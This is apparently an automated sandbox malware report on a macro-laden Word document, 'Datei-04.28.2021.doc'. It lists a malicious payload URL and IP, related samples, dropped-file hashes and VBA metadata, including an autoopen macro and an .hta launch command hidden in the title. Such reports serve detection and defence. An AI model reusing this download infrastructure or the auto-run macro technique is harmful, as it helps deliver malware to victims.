    http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTsfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comregsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpfalse
                high
                http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4vbaProject.binfalse
                • Avira URL Cloud: safe
                unknown
                http://www.%s.comPAregsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                low
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeregsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmpfalse
                  high
                  http://servername/isapibackend.dllregsvr32.exe, 00000004.00000002.2092951876.0000000001CD0000.00000002.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  45.142.215.160
                  better-transport-2008.comRussian Federation
                  202933CLOUDSOLUTIONSRUfalse

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:399362
                  Start date:28.04.2021
                  Start time:17:58:35
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 0s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Datei-04.28.2021.doc
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Run name:Without Instrumentation
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal64.expl.winDOC@4/12@1/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  17:59:43API Interceptor1x Sleep call for process: regsvr32.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  45.142.215.160Datei-04.28.2021.docGet hashmaliciousBrowse
                    Datei-04.28.2021.docGet hashmaliciousBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      better-transport-2008.comDatei-04.28.2021.docGet hashmaliciousBrowse
                      • 45.142.215.160

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      CLOUDSOLUTIONSRUDatei-04.28.2021.docGet hashmaliciousBrowse
                      • 45.142.215.160
                      Datei-04.28.2021.docGet hashmaliciousBrowse
                      • 45.142.215.160
                      richiedere-04.26.21.docGet hashmaliciousBrowse
                      • 45.142.215.164
                      richiedere-04.26.21.docGet hashmaliciousBrowse
                      • 45.142.215.164
                      richiedere-04.26.21.docGet hashmaliciousBrowse
                      • 45.142.215.164
                      verschreiben.04.26.2021.docGet hashmaliciousBrowse
                      • 45.142.215.163
                      verschreiben.04.26.2021.docGet hashmaliciousBrowse
                      • 45.142.215.163
                      verschreiben.04.26.2021.docGet hashmaliciousBrowse
                      • 45.142.215.163
                      3IsEcDekqj.exeGet hashmaliciousBrowse
                      • 45.142.215.63
                      Handel-04.20.2021.docGet hashmaliciousBrowse
                      • 45.142.215.16
                      Handel-04.20.2021.docGet hashmaliciousBrowse
                      • 45.142.215.16
                      der Vorschlag.04.21.docGet hashmaliciousBrowse
                      • 45.142.215.16
                      der Vorschlag.04.21.docGet hashmaliciousBrowse
                      • 45.142.215.16
                      der Vorschlag.04.21.docGet hashmaliciousBrowse
                      • 45.142.215.16
                      zu erzaehlen.docGet hashmaliciousBrowse
                      • 45.142.215.32
                      zu erzaehlen.docGet hashmaliciousBrowse
                      • 45.142.215.32
                      zu erzaehlen.docGet hashmaliciousBrowse
                      • 45.142.215.32
                      verschreiben 04.16.2021.docGet hashmaliciousBrowse
                      • 45.142.215.32
                      verschreiben 04.16.2021.docGet hashmaliciousBrowse
                      • 45.142.215.32
                      verschreiben 04.16.2021.docGet hashmaliciousBrowse
                      • 45.142.215.32

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\argumentSelectTmp.jpg
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:HTML document, ASCII text
                      Category:dropped
                      Size (bytes):204
                      Entropy (8bit):5.134216527532146
                      Encrypted:false
                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                      MD5:FEDDB78986726A4A2161D362A5D52F25
                      SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                      SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                      SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                      Malicious:false
                      Reputation:low
                      Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\laka4[1].htm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:HTML document, ASCII text
                      Category:downloaded
                      Size (bytes):204
                      Entropy (8bit):5.134216527532146
                      Encrypted:false
                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                      MD5:FEDDB78986726A4A2161D362A5D52F25
                      SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                      SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                      SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                      Malicious:false
                      Reputation:low
                      IE Cache URL:http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs
                      Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73886A23.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:[TIFF image data, little-endian, direntries=14, height=630, bps=182, compression=LZW, PhotometricIntepretation=RGB, orientation=upper-left, width=2288], baseline, precision 8, 828x186, frames 3
                      Category:dropped
                      Size (bytes):79188
                      Entropy (8bit):7.847381222647767
                      Encrypted:false
                      SSDEEP:1536:3hdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6eh:MlZAPY2yWwb3ZadaxHeuNQpeh
                      MD5:A1BAC07A20C5DF390D6D96B0FB713F5D
                      SHA1:427F044786B5C412EF3B424CDA2DEA817AA9CCA6
                      SHA-256:0638205EBB792E3447169B46FBFB6BC48A1433B8335794ED4CEB6706F5290EF3
                      SHA-512:1EBB00551E59417AA5CC16D195E27EE227342108C4C093D9A747241BAC6AC54A48262686AD3911DFDCF89AA1EA3E2A1C91CAE790252A5C2C81978F362CCA2BA1
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: .....xExif..II*...........................v...................................................................................................(...........1...........2...........i...........0................'.......'..Adobe Photoshop 22.2 (Windows).2021:04:08 01:34:08..........................<...........................................~...............(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................$...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......S.,.2....}....sC.:.....k..}OS.6~..?Yz.......}M...|....
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:Microsoft Word 2007+
                      Category:dropped
                      Size (bytes):20515
                      Entropy (8bit):7.469835486287775
                      Encrypted:false
                      SSDEEP:384:Pjl/SU5NrbWwV+A9QG6F7//oMaoNy3aPWPOzROejkIQMAPZU:LrPlo1k3aPWPONjkIFAK
                      MD5:747F920591F171BA793209DB3BFD8A21
                      SHA1:BCF601F9500A6B5C20DB101840F4288D685FC57D
                      SHA-256:74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
                      SHA-512:0D37436D7BF6BF640377525F7E2E926929B64C5D31686B4CF69083CCCDF53AC4F85F98BF380D49DE9B585055237FA9156D696C81081B676364771F2415790683
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: PK..........!.+:.P............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g..6@]t.#.._.0..}......QM.l..1....5...YS.@D.].....I..[....k..U..S.x.-......7..6.V..e...'.Qn..l|.Go:..Ht..<.y%....f.....Ku..l1....6.Z...=I......0{.L.`...H..S.\.CC..op...#..O:.7....Si.VP]....K...G...rh.......$....BF.t..Z.y.]O..+...,..{.j.uZ...qB...i..i.....t.,..$-my.{...q7H..JL..{P.E..../Fq$>...FX.)...b...k..E.Ni..0C..^.P..7z`.......E<......)...G.]....9./......g...I4...g....<eI[."..4m.?.6.q..k
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{490043CF-DA25-4B44-A5F3-281D3BE3AC4A}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1536
                      Entropy (8bit):0.1903644670878318
                      Encrypted:false
                      SSDEEP:3:/lMlt4slllFlNtwl5h9Z9:+lr45v
                      MD5:43EADFFEFD5914B486C8193474EA3408
                      SHA1:048972F9F902493E595F848E45052DF938621907
                      SHA-256:46F3BCD8D35DE83BDD29CA5C831E78C421869E3D4D0F8DDD60CD2A9E8E60ED77
                      SHA-512:11BBE96AFE28472C497DC7252560D77B9595C904C2253881AC407DFD5F23A3D4EA29526DB4DCA242B074D83217459D10FB428ACF92B934C17C286E73A87A3338
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{905296D0-886E-495C-BACA-6A30C1B9E4F3}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B02F65D-537D-406E-B057-1B1541B1D39D}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162688
                      Entropy (8bit):4.254385262261889
                      Encrypted:false
                      SSDEEP:1536:C6iL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CrJNSc83tKBAvQVCgOtmXmLpLm4l
                      MD5:195B512BF828E6BB1CFCA2CA7D4F6934
                      SHA1:532DD99AE79FFE705926EFCC4D3BCE4013DDFD9C
                      SHA-256:8A50F8F16887816C446FDC8FCFC209FAC328C17BE5B71267D787222B949CD6A3
                      SHA-512:38568620FCBAC080CA73DBB5B22D07044BBE213B92F229C59085C5838E202E94A8F3ED54EA61B86A85A41FB9359077CE02C0B661F0B35E1BDC72BFB9C3B54622
                      Malicious:false
                      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Datei-04.28.2021.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Apr 28 23:59:30 2021, length=103261, window=hide
                      Category:dropped
                      Size (bytes):2088
                      Entropy (8bit):4.536750505097161
                      Encrypted:false
                      SSDEEP:24:8NS/XTwz6Ikn7qOe85bDv3q0dM7dD2NS/XTwz6Ikn7qOe85bDv3q0dM7dV:8E/XT3Ik7lrU0Qh2E/XT3Ik7lrU0Q/
                      MD5:93F8BB958F53A70162B0496DB4F74AD8
                      SHA1:A20EB1D97E3E36A2AC77B4F0CA5D44A2D07A3DFE
                      SHA-256:A05344D0A236472B793D81456161DA9559A6AE259097C5E4101BB3D74D7E8544
                      SHA-512:E28B22379C584983B09AE4A3D18A3C3E6118C2837BECD16CF6B13DA8E28B0C9C2BB411F223C48F3DFEB356C8F6154750942E8C2C81367E19FCB2A6856A8E0D4E
                      Malicious:false
                      Preview: L..................F.... ....ju..{...ju..{......<..]............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.]....Rp. .DATEI-~1.DOC..V.......Q.y.Q.y*...8.....................D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\632922\Users.user\Desktop\Datei-04.28.2021.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......632922..........D_....3N...W...9F.C....
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):86
                      Entropy (8bit):4.326022969633015
                      Encrypted:false
                      SSDEEP:3:M1SmMIRVELUl5eIRVELUlmX1SmMIRVELUlv:MQ7rLUrerLUf7rLU1
                      MD5:0BDE91546ED3D50D1B9A1B4A37CF9572
                      SHA1:16FC4A4A6EA006B381E57857AB4B29D966A847EB
                      SHA-256:4066E345B4B51909606757F4B5875000A5C838A8F8DE107415E6D67470FB032E
                      SHA-512:5133A71D4FBEE2EE09CA4626944F07C7AE3DF9F24CC6C3767488A57D9E1E23A6E6D01C8521A56A811DFE3CA18B375AEA3B8E45534A2DABA4FD1869307AD91FDC
                      Malicious:false
                      Preview: [doc]..Datei-04.28.2021.LNK=0..Datei-04.28.2021.LNK=0..[doc]..Datei-04.28.2021.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\Desktop\~$tei-04.28.2021.doc
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                      Static File Info

                      General

                      File type:Microsoft Word 2007+
                      Entropy (8bit):7.82220089201397
                      TrID:
                      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                      • ZIP compressed archive (8000/1) 5.23%
                      File name:Datei-04.28.2021.doc
                      File size:103261
                      MD5:6747583727ce069aa8ae9d398d35e5bc
                      SHA1:97667bf552bf5557666b5266003b0411bc1669bc
                      SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
                      SHA512:88ca8855faf07a809f7badd05e0a36da9b24f103204e66ff2624de77a6f86428bee188f290dd224cabf99fe9ba0d28e73d543967d9e591fed69128ddf08e1719
                      SSDEEP:1536:AH1R5bJCWehdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6egTm:KbJrlZAPY2yWwb3ZadaxHeuNQpegTm
                      File Content Preview:PK..........!.x..}....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4eea2aaa4b4b4a4

                      Static OLE Info

                      General

                      Document Type:OpenXML
                      Number of OLE Files:1

                      OLE File "/opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:False
                      Contains Word Document Stream:
                      Contains Workbook/Book Stream:
                      Contains PowerPoint Document Stream:
                      Contains Visio Document Stream:
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Title:explorer c:\users\public\argumentSelectTmp.hta
                      Subject:
                      Author:ujmg
                      Keywords:
                      Template:Normal
                      Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
                      Revion Number:2
                      Total Edit Time:0
                      Create Time:2021-04-28T04:45:00Z
                      Last Saved Time:2021-04-28T04:45:00Z
                      Number of Pages:1
                      Number of Words:0
                      Number of Characters:0
                      Creating Application:Microsoft Office Word
                      Security:4

                      Document Summary

                      Number of Lines:2
                      Number of Paragraphs:0
                      Thumbnail Scaling Desired:false
                      Company:
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:16.0000

                      Streams with VBA

                      VBA File Name: ThisDocument.cls, Stream Size: 1127
                      General
                      Stream Path:VBA/ThisDocument
                      VBA File Name:ThisDocument.cls
                      Stream Size:1127
                      Data ASCII:. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . - . . i . H . ! . . W D Q . . . . . . . . K . . . . y . ' y . . . . . . . . . . . . . . . . . . . . X . O z . Y $ L . . . & . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . X . O z . Y $ L . . . & . . . - . . - . . i . H . ! . . W D Q . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 71 cc 96 90 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 03 7f 2d b5 fa 69 1d 48 9e 21 86 f4 57 44 51 84 ef 8e e3 9e df be fe 4b b5 1f 1d 00 79 ba 27 79 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      False
                      VB_Exposed
                      Attribute
                      VB_Creatable
                      VB_Name
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      "ThisDocument"
                      VBA Code
                      VBA File Name: UserForm1.frm, Stream Size: 1182
                      General
                      Stream Path:VBA/UserForm1
                      VBA File Name:UserForm1.frm
                      Stream Size:1182
                      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . q . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 71 cc 28 c6 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      False
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_Creatable
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code
                      VBA File Name: listCopy.bas, Stream Size: 1037
                      General
                      Stream Path:VBA/listCopy
                      VBA File Name:listCopy.bas
                      Stream Size:1037
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . . . . . . . . . . . q . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 00 f0 00 00 00 92 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 99 02 00 00 6d 03 00 00 00 00 00 00 01 00 00 00 71 cc c1 2d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      "listCopy"
                      clearIteratorRef
                      Attribute
                      autoopen()
                      convertIndex
                      VB_Name
                      viewValueTextbox
                      memoryIndex
                      String
                      VBA Code
                      VBA File Name: optionRemoveGeneric.bas, Stream Size: 1304
                      General
                      Stream Path:VBA/optionRemoveGeneric
                      VBA File Name:optionRemoveGeneric.bas
                      Stream Size:1304
